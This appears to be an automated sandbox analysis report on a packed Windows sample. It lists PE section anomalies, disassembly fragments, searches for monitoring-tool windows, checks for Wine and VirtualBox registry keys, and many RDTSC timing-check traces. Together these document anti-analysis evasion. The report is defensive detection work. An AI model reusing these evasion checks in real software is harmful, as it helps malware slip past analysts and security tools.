              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00516390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00516390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cf0dc should be: 0x1c2d8e
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: kuxshahz
Source: file.exe | Static PE information: section name: horlowmv
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0098E09B push edi; mov dword ptr [esp], 52714DB1h | 0_2_0098E0C2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CE87B push eax; mov dword ptr [esp], edx | 0_2_007CE8F8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007CE87B push ecx; mov dword ptr [esp], esi | 0_2_007CE914
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008D3897 push 6B23079Ah; mov dword ptr [esp], esi | 0_2_008D38DA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EC860 push eax; mov dword ptr [esp], edx | 0_2_007EC889
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EC860 push edx; mov dword ptr [esp], ebx | 0_2_007EC934
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EC860 push 22ABFD69h; mov dword ptr [esp], eax | 0_2_007EC9B4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EC860 push 2C0897D0h; mov dword ptr [esp], ecx | 0_2_007EC9E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007EC860 push eax; mov dword ptr [esp], edx | 0_2_007ECA9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009528B1 push 08E238A0h; mov dword ptr [esp], esi | 0_2_0095293F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008BD8A4 push 1245C093h; mov dword ptr [esp], ebx | 0_2_008BD8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0095F0A7 push ecx; mov dword ptr [esp], ebx | 0_2_0095F0CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009268AB push 7AA5ECFFh; mov dword ptr [esp], esp | 0_2_009268EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EB0CA push edi; mov dword ptr [esp], ecx | 0_2_008EB11E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EB0CA push 67741141h; mov dword ptr [esp], esi | 0_2_008EB140
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008EB0CA push edx; mov dword ptr [esp], edi | 0_2_008EB15E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096F0F4 push 1C5FEE5Ah; mov dword ptr [esp], edi | 0_2_0096F15D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0096F0F4 push 6E4ABB5Ah; mov dword ptr [esp], edx | 0_2_0096F28A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092900F push 26BB4F21h; mov dword ptr [esp], ebp | 0_2_00929077
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0092900F push edi; mov dword ptr [esp], eax | 0_2_009290CB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00972838 push 20E392EAh; mov dword ptr [esp], eax | 0_2_00972841
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00517895 push ecx; ret | 0_2_005178A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00976042 push esi; mov dword ptr [esp], eax | 0_2_00976065
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00976042 push ebp; mov dword ptr [esp], 57DEBE71h | 0_2_0097607C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00976042 push ebp; mov dword ptr [esp], edi | 0_2_00976101
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0085A859 push 772C03E0h; mov dword ptr [esp], ebp | 0_2_0085A881
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push edi; mov dword ptr [esp], edx0_2_0085A88D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push edx; mov dword ptr [esp], ebx0_2_0085A95B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push edx; mov dword ptr [esp], ecx0_2_0085A99E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0085A859 push 7A0DC21Dh; mov dword ptr [esp], eax0_2_0085A9C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B4875 push eax; mov dword ptr [esp], ecx0_2_008B487A
              Source: file.exeStatic PE information: section name: kuxshahz entropy: 7.953437289749726

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00516390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00516390

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-25702
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F026C second address: 8F0270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF93E second address: 8EF959 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0270 second address: 8F0276 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0276 second address: 8F027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F22AC second address: 8F234D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE52CC95242h 0x0000000e popad 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FE52CC95238h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D2BB2h], ebx 0x00000032 or esi, dword ptr [ebp+122D182Bh] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007FE52CC95238h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 mov esi, 2A205DE0h 0x00000059 push 00000000h 0x0000005b mov esi, ebx 0x0000005d xchg eax, ebx 0x0000005e jmp 00007FE52CC95247h 0x00000063 push eax 0x00000064 push eax 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2C9C second address: 8F2CA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F3687 second address: 8F36FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007FE52CC95238h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 jmp 00007FE52CC95247h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2F39h], ebx 0x00000031 xchg eax, ebx 0x00000032 jmp 00007FE52CC95240h 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FE52CC95247h 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F420C second address: 8F421E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FE52CBFFE18h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F421E second address: 8F4225 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F4A5D second address: 8F4A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA258 second address: 8FA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA25C second address: 8FA266 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE52CBFFE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2BD second address: 8FB2C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2C1 second address: 8FB2C7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FA3C9 second address: 8FA3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE52CC95247h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2C7 second address: 8FB2DA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FE52CBFFE1Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FB2DA second address: 8FB2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC117 second address: 8FC128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jng 00007FE52CBFFE20h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC128 second address: 8FC19A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+1244E99Bh], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007FE52CC95238h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 jmp 00007FE52CC9523Bh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FE52CC95238h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a or edi, dword ptr [ebp+122D354Bh] 0x00000050 sub dword ptr [ebp+122D188Bh], esi 0x00000056 mov dword ptr [ebp+122D2581h], ebx 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 pushad 0x00000061 popad 0x00000062 pop edi 0x00000063 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC19A second address: 8FC1B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FCFFF second address: 8FD070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ebx, dword ptr [ebp+122D3972h] 0x0000000f mov di, A5E0h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007FE52CC95238h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FE52CC95238h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b mov ebx, edx 0x0000004d xchg eax, esi 0x0000004e jmp 00007FE52CC95244h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC39A second address: 8FC39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FC39F second address: 8FC3A4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD070 second address: 8FD076 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD076 second address: 8FD080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FE52CC95236h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD21C second address: 8FD220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FE396 second address: 8FE3AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95240h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 901326 second address: 901360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FE52CBFFE2Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE52CBFFE22h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9004C4 second address: 9004E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE52CC9523Ch 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jl 00007FE52CC95236h 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2946 second address: 8B2951 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904711 second address: 904726 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CC95236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FE52CC95236h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904726 second address: 904792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FE52CBFFE18h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor edi, 2BE466CEh 0x0000002b push 00000000h 0x0000002d xor ebx, dword ptr [ebp+122D1C5Ah] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FE52CBFFE18h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push eax 0x00000050 push eax 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7756 second address: 8B775A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B775A second address: 8B778D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FE52CBFFE16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE52CBFFE1Ah 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 jnl 00007FE52CBFFE16h 0x0000001a push edi 0x0000001b pop edi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f jp 00007FE52CBFFE18h 0x00000025 push esi 0x00000026 pop esi 0x00000027 pushad 0x00000028 push edx 0x00000029 pop edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90576C second address: 905792 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FE52CC95236h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007FE52CC9523Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jl 00007FE52CC95236h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9058B1 second address: 9058B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9058B5 second address: 9058CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC95242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9058CF second address: 9058D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908FF8 second address: 908FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 908015 second address: 90801C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90801C second address: 9080B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 add dword ptr [ebp+12480C3Ch], ecx 0x0000000d mov bx, ax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FE52CC95238h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 mov di, EB63h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007FE52CC95240h 0x00000041 mov eax, dword ptr [ebp+122D0901h] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007FE52CC95238h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 push FFFFFFFFh 0x00000063 mov edi, dword ptr [ebp+122D3A1Eh] 0x00000069 nop 0x0000006a push eax 0x0000006b push edx 0x0000006c jo 00007FE52CC95244h 0x00000072 jmp 00007FE52CC9523Eh 0x00000077 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9080B5 second address: 9080D8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE52CBFFE24h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FE52CBFFE1Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9080D8 second address: 9080DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909F91 second address: 90A029 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CBFFE21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FE52CBFFE29h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FE52CBFFE18h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov bl, dh 0x0000002d push 00000000h 0x0000002f mov edi, 678B1D5Dh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edi 0x00000039 call 00007FE52CBFFE18h 0x0000003e pop edi 0x0000003f mov dword ptr [esp+04h], edi 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc edi 0x0000004c push edi 0x0000004d ret 0x0000004e pop edi 0x0000004f ret 0x00000050 jmp 00007FE52CBFFE21h 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pushad 0x0000005a popad 0x0000005b pop edi 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 909135 second address: 90915E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jmp 00007FE52CC9523Ah 0x0000000b pop ebx 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE52CC95243h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90915E second address: 909162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BF61 second address: 90BF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE52CC95245h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BF7A second address: 90BF97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FE52CBFFE27h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C577 second address: 90C5E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE52CC9523Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FE52CC95238h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007FE52CC95238h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000014h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 sub di, 8C1Eh 0x00000047 push 00000000h 0x00000049 mov edi, dword ptr [ebp+122D18EBh] 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 ja 00007FE52CC95238h 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A153 second address: 90A157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90A157 second address: 90A15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90C761 second address: 90C767 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4323 second address: 8B4327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4327 second address: 8B432B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
